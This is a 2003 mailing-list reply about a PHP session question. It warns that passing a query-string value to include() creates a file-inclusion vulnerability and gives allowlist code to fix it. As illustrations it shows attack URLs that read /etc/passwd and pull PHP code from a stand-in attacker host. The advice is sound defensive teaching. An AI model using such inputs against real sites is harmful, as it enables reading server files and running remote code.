[thelist] url specific session problem
Simon Willison
cs1spw at bath.ac.uk
Wed Sep 17 10:38:44 CDT 2003
elin tjerngren. artopod wrote:
> I have a weird PHP session problem.
> The links look something like this:
>
> index.php?page=intrview/archive.php
This is unrelated to your problem, but does that URL mean that somewhere
in your script you're doing this?
include($_GET['page']);
If so, you've got a HUGE security problem. What happens if someone
manually enters a URL like this for example:
index.php?page=/etc/passwd
Or even worse, if the fopen url wrappers option is set in your PHP
config file they could even do this:
index.php?page=http://evil.hax0r.ru/inject-some-php-code.txt
Where inject-some-php-code.txt is a file that looks like this:
<?php
// nasty PHP code that will be executed on your server
?>
A golden rule of writing secure PHP is NEVER include() or require() a
file that has been passed as a query string argument. Instead, do
something like this:
$allowed = array(
'interview/archive.php',
'blah/blah.php',
// ... etc
);
if (in_array($_GET['page'], $allowed)) {
include($_GET['page']);
} else {
die('Invalid page');
}
That's more secure, but it's still revealing your site's implementation
details in the URL. The best URLs consist only of logical information,
with no clues as to the technology that powers a site. For example:
http://www.yourdomain.com/interview/archive
If you're running Apache, the easiest way to achieve this kind of URL is
using mod_rewrite, which is way too big a topic to cover here.
Cheers,
Simon Willison
http://simon.incutio.com/ <-- nice URLs ;)
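The two points above (never include() a file named by the query string, and keep implementation details out of the URL) can be combined in one allowlist that maps a logical page name to the file that renders it. This is an added example, not code from the original post; the page names, the pages/ directory and the default 'about' route are assumptions.

```php
<?php
// Added example: the URL carries only a logical name, e.g.
// index.php?page=interview/archive, and this map decides which file that
// name corresponds to. The requested value is never used as a path itself.
$pages = array(
    'interview/archive' => __DIR__ . '/pages/interview/archive.php',
    'about'             => __DIR__ . '/pages/about.php',
);

// Returns the file to include for $requested, or null if it is not an
// exact key of the allowlist. Using array_key_exists() on an associative
// array means paths, URLs and non-string input all fall through to null.
function resolve_page(array $pages, $requested)
{
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        return null;
    }
    return $pages[$requested];
}

$requested = isset($_GET['page']) ? $_GET['page'] : 'about';
$target = resolve_page($pages, $requested);

if ($target === null) {
    http_response_code(404);
    exit('Invalid page');
}

// Only a value taken from our own map ever reaches include/require.
require $target;
```

With mod_rewrite mapping /interview/archive to index.php?page=interview/archive, the visible URL stays free of .php and directory details while the include target remains fixed by the map.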